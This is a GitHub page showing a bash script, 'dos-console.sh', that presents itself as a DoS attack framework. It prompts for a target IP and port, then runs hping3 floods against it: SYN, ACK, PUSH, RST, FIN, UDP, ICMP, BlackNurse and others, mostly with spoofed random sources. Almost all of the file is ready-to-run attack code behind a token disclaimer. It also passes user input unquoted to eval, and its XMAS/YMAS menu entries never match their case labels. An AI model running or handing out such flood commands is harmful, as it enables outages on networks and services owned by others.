-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdos-console.sh
162 lines (153 loc) · 5.56 KB
/
dos-console.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
#!/bin/bash
# Run as Root!
if [ "$EUID" -ne 0 ]
then echo "Please run as root"
exit
fi
# hping3 directory
hping='/usr/sbin/hping3'
# Welcome Message
whiptail --msgbox "Welcome to DoS Attack Framework" 10 40
whiptail --msgbox "Do not use for malicious attacks!" 10 40
# Destination IP Address
IP=$(whiptail --inputbox "Please enter the destination IP Adresss" 10 50 3>&1 1>&2 2>&3)
if [ -z "$IP" ]
then
exit
fi
# Destination Port Adress
PORT=$(whiptail --inputbox "Please enter the destination Port Adress" 10 50 3>&1 1>&2 2>&3)
if [ -z "$PORT" ]
then
exit
fi
# Attack Choice
while [ 1 ]
do
CHOICE=$(whiptail --menu "Please select the attack type" 18 110 10 \
"SYN-Flood" "sends TCP packets with SYN flag" \
"PUSH-Flood" "sends TCP packets with PUSH flag" \
"PUSH+ACK-Flood" "sends TCP packets with PUSH+ACK flags" \
"PUSH+ACK-Flood(with Timestamp)" "sends PUSH+ACK flag with manipulated timestamp values" \
"ACK-Flood" "sends TCP packets with ACK flag" \
"ACK-Flood(with Timestamp)" "sends ACK flag with manipulated timestamp values" \
"ACK-Flood(single source)" "sends ACK flag from single port" \
"RST-Flood" "sends TCP packers with RST flag" \
"FIN-Flood" "sends TCP packets with FIN flag" \
"SYN+ACK-Flood" "sends TCP packets with SYN+ACK flags" \
"SYN+ACK-Flood(with Timestamp)" "sends SYN+ACK flag with manipulated timestamp values" \
"UDP-Flood" "send a high volume of UDP packets" \
"UDP-FLood(volumetric)" "sends massive UDP traffic" \
"UDP-Flood(fragmented)" "sends fragmented UDP packets" \
"ICMP-Flood" "sends a high volume of ICMP packets" \
"ICMP-Flood(volumetric)" "sends massive ICMP traffic" \
"XMAS-Flood" "sends TCP packets with specific flag combinations" \
"YMAS-FLood" "sends TCP packets with specific flag combinations" \
"BlackNurse" "A complex attack with ICMP" 3>&1 1>&2 2>&3)
if [ -z "$CHOICE" ]
then
exit
else
if (whiptail --yesno --defaultno "Start Attack?" 10 50)
then
break
fi
fi
done
case $CHOICE in
"SYN-Flood")
cmd="$hping -i u1 -S --rand-source -p $PORT $IP --tos 21 --ttl 33 -d 99"
echo "Running: "$cmd
eval $cmd
;;
"PUSH-Flood")
cmd="$hping -P -p $PORT $IP --flood --rand-source --tos 33 --ttl 74 -d 54"
echo "Running: "$cmd
eval $cmd
;;
"PUSH+ACK-Flood")
cmd="$hping -PA -p $PORT $IP --flood --rand-source --tos 23 --ttl 44 -d 12"
echo "Running: "$cmd
eval $cmd
;;
"PUSH+ACK-Flood(with Timestamp)")
cmd="$hping -PA -p $PORT $IP --flood --rand-source --tcp-timestamp --tos 78 --ttl 43 -d 37"
echo "Running: "$cmd
eval $cmd
;;
"SYN+ACK-Flood")
cmd="$hping -SA -p $PORT $IP --flood --rand-source --tos 12 --ttl 39 -d 90"
echo "Running: "$cmd
eval $cmd
;;
"SYN+ACK-Flood(with Timestamp)")
cmd="$hping -SA --tcp-timestamp -p $PORT $IP --flood --rand-source --tos 67 --ttl 134 -d 53"
echo "Running: "$cmd
eval $cmd
;;
"ICMP-Flood")
cmd="$hping --icmp -i u1 $IP --rand-source"
echo "Running: "$cmd
eval $cmd
;;
"ICMP-Flood(volumetric)")
cmd="$hping --icmp -i u1 -d 1300 $IP --rand-source"
echo "Running: "$cmd
eval $cmd
;;
"ACK-Flood")
cmd="$hping --ack -p $PORT $IP --flood --rand-source --tos 28 --ttl 124 -d 98"
echo "Running: "$cmd
eval $cmd
;;
"ACK-Flood(with Timestamp)")
cmd="$hping --ack -p $PORT $IP --flood --rand-source --tcp-timestamp --tos 27 --ttl 132 -d 91"
echo "Running: "$cmd
eval $cmd
;;
"ACK-Flood(single source)")
cmd="$hping --ack -p $PORT $IP --flood -a 10.103.1.104 --tos 77 --ttl 167 -d 80"
echo "Running: "$cmd
eval $cmd
;;
"RST-Flood")
cmd="$hping --rst -p $PORT $IP --flood --rand-source"
echo "Running: "$cmd
eval $cmd
;;
"FIN-Flood")
cmd="$hping --fin -p $PORT $IP --flood --rand-source"
echo "Running: "$cmd
eval $cmd
;;
"UDP-Flood")
cmd="$hping --flood --rand-source --udp $IP -p $PORT --rand-source"
echo "Running: "$cmd
eval $cmd
;;
"UDP-FLood(volumetric)")
cmd="$hping --flood --rand-source --udp $IP -p $PORT --rand-source --data 1400"
echo "Running: "$cmd
eval $cmd
;;
"UDP-Flood(fragmented)")
cmd="$hping --flood --rand-source --udp $IP -p $PORT --rand-source -x"
echo "Running: "$cmd
eval $cmd
;;
"BlackNurse")
cmd="$hping --icmp -C 8 -K 3 --flood $IP --rand-source"
echo "Running: "$cmd
eval $cmd
;;
"X-MAS-Flood")
cmd="$hping --xmas -p $PORT $IP --flood --rand-source"
echo "Running: "$cmd
eval $cmd
;;
"Y-MAS-Flood")
cmd="$hping --ymas -p $PORT $IP --flood --rand-source"
echo "Running: "$cmd
eval $cmd
;;
esac